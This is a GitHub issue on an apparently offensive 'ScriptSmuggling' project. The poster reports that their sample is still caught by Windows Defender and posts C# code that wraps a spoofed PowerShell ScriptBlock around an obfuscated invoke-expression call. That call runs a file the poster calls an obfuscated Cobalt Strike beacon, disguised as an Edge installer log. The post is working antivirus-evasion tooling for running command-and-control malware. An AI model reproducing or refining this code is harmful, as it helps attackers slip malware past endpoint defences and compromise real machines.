Skip to content

Still be detected by wdfdr... #2

New issue
New issue
Open
Open
Still be detected by wdfdr...#2
@NickYan7

Description

@NickYan7
NickYan7
opened on Jun 24, 2024

A very nice anti-detection idea, however my sample still can be detected by Windows Defender, here is the demo code:

...
namespace ScriptSmuggling
{
    public class Program
    {
        public static void Main()
        {
            // the msedge_installer.log is an obfuscated cobaltstrike beacon file (.ps1). it can be execute by iex
            string script = @". ($pShOmE[4]+$PsHoMe[34]+'X') (cat C:\Windows\Temp\msedge_installer.log)";
            ScriptBlock sb = BuildSpoofedBlock(script);
            // Setup PowerShell runspace
            using (Runspace runSpace = RunspaceFactory.CreateRunspace())
            {
                runSpace.Open();
                using (PowerShell ps = PowerShell.Create())
                {
                    ps.Runspace = runSpace;




                    ps.AddCommand("Invoke-Command")
                      .AddParameter("ScriptBlock", sb);

                    Collection<PSObject> results = ps.Invoke();
                    foreach (PSObject result in results)
                    {
                        Console.WriteLine(result);
                    }

                    // Display any errors from the error stream
                    foreach (ErrorRecord error in ps.Streams.Error)
                    {
                        Console.WriteLine("ERROR: " + error);
                    }
                }
            }
        }



        public static ScriptBlock BuildSpoofedBlock(string content)
        {
            ...
        }
    }
}

Maybe the executableAst is still be check by wdfdr?

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions